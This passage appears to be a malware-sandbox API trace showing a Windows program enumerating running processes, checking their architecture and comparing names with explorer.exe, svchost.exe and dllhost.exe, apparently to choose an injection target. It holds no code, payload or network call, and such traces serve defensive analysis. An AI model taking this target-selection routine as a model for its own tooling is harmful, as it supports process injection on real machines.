(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0189.899] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.899] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.899] CloseHandle (hObject=0xec) returned 1 [0189.899] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.899] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0189.900] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.900] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.900] CloseHandle (hObject=0xec) returned 1 [0189.900] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0189.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0189.900] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.900] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.900] CloseHandle (hObject=0xec) returned 1 [0189.900] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0189.900] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0189.900] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0189.900] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0189.901] CloseHandle (hObject=0xe8) returned 1 [0189.901] Sleep (dwMilliseconds=0x3e8) [0190.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0190.955] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0190.955] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0190.956] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0190.956] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0190.957] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0190.957] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0190.958] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0190.958] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0190.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0190.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0190.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0190.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0190.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0190.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0190.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0190.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0190.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0190.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0190.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0190.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0190.964] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.964] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.964] CloseHandle (hObject=0xec) returned 1 [0190.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0190.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0190.965] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.965] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.965] CloseHandle (hObject=0xec) returned 1 [0190.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0190.967] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0190.967] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0190.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0190.968] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.968] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.968] CloseHandle (hObject=0xec) returned 1 [0190.968] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0190.968] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0190.968] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0190.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0190.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0190.969] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.969] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.969] CloseHandle (hObject=0xec) returned 1 [0190.969] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0190.969] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0190.969] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0190.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0190.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0190.970] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.970] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.970] CloseHandle (hObject=0xec) returned 1 [0190.970] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0190.970] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0190.970] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0190.970] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0190.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0190.970] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.970] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.970] CloseHandle (hObject=0xec) returned 1 [0190.970] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0190.970] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0190.971] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0190.971] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0190.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0190.971] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.971] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.971] CloseHandle (hObject=0xec) returned 1 [0190.971] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0190.971] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0190.971] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0190.971] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0190.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0190.972] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.972] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.972] CloseHandle (hObject=0xec) returned 1 [0190.972] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0190.972] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0190.972] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0190.972] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0190.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0190.972] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.972] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.972] CloseHandle (hObject=0xec) returned 1 [0190.972] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0190.972] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0190.973] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0190.973] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0190.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0190.973] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.973] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.973] CloseHandle (hObject=0xec) returned 1 [0190.973] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0190.973] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0190.973] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0190.973] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0190.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0190.974] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.974] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.974] CloseHandle (hObject=0xec) returned 1 [0190.974] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0190.974] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0190.974] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0190.974] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0190.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0190.974] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.974] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.974] CloseHandle (hObject=0xec) returned 1 [0190.974] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0190.975] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0190.975] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0190.975] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0190.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0190.975] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.975] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.975] CloseHandle (hObject=0xec) returned 1 [0190.975] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0190.975] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0190.975] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0190.975] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0190.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0190.976] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.976] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.976] CloseHandle (hObject=0xec) returned 1 [0190.976] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0190.976] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0190.976] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0190.976] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0190.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0190.976] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.976] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.977] CloseHandle (hObject=0xec) returned 1 [0190.977] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0190.977] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0190.977] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0190.977] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0190.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0190.977] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.977] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.977] CloseHandle (hObject=0xec) returned 1 [0190.977] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0190.977] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0190.977] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0190.977] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0190.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0190.978] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.978] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.978] CloseHandle (hObject=0xec) returned 1 [0190.978] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0190.978] lstrcmpiA (lpString1="wooden.exe", 